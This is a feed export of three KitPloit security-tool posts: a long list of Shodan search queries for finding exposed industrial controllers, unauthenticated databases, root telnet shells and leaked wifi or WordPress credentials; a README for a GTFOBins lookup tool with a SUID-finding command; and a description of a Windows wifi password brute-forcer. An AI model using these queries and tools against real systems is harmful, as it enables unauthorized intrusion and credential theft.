tag:blogger.com,1999:blog-83172222311336605472024-03-18T23:44:42.840-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger1933125tag:blogger.com,1999:blog-8317222231133660547.post-81316120703268537362024-03-18T08:30:00.000-03:002024-03-18T08:30:00.134-03:00Shodan Dorks<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div><p><br /></p><h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions</p><span><a name='more'></a></span><p><br /></p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or /x CIDR. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices before or after between a given time. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self signed certificates <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers & Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35363097260777600322024-03-12T20:38:00.002-03:002024-03-12T20:38:28.523-03:00Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems<h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2><p><br /></p> <p><code>GTFOcli</code> it's a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for easy binaries search commands that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for binaries located into file;</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for binaries located into file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for binary <code>tar</code> and print output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for binaries located into file mounted as volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>An example of common use case for <code>gtfocli</code> is together with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>, without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-43932165222763295862024-03-07T08:30:00.007-03:002024-03-07T08:30:00.234-03:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p><pre><br /></pre> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The packages are minimal or nearly none 😅. The package install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>Thats it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em></li> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability</li> <li><em>Code-Wise Features:</em></li> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>versatility in using interface, targets, and password files.</li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing all the packages just run <code>python main.py</code> rest is <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> 👍 make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions: - <em>First Clone:</em> First Clone the repo into your dev env and do the edits. - <em>Comments:</em> I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - <em>Submit:</em> Submit a PR for me to verify the changes and apprive it if necessary.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download 